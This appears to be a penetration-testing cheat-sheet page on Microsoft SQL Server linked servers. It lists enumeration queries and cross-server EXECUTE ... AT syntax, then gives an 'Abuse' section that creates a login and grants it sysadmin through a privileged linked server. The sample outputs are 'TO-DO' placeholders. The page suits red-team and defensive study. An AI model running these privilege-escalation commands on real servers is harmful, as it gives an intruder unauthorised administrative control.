TLDRBins TLDRBins / MSSQL Linked Servers


Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Basic Commands

Hint: Use double '' to escape ' in mssql

# Show current server select @@servername
Sample Output: TO-DO
# Show linked servers select srvname from sysservers;
Sample Output: TO-DO
# Show linked servers enum_links
Sample Output: TO-DO

Execute Query between Linked Servers

# Execute query from current server to linked server EXECUTE ('select @@version;') at [<LINKED_SERVER>];
Sample Output: TO-DO
# Execute query from linked server to current server EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [<CURRENT_SERVER>]') at [<LINKED_SERVER>];
Sample Output: TO-DO

Abuse #1: Create Admin User from Privilege Linked Server

EXECUTE('EXECUTE(''CREATE LOGIN <USER> WITH PASSWORD = ''''<PASSWORD>'''';'') AT [<CURRENT_SERVER>]') AT [<LINKED_SERVER>]
Sample Output: TO-DO
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''<USER>'''', ''''sysadmin'''''') AT [<CURRENT_SERVER>]') AT [<LINKED_SERVER>]
Sample Output: TO-DO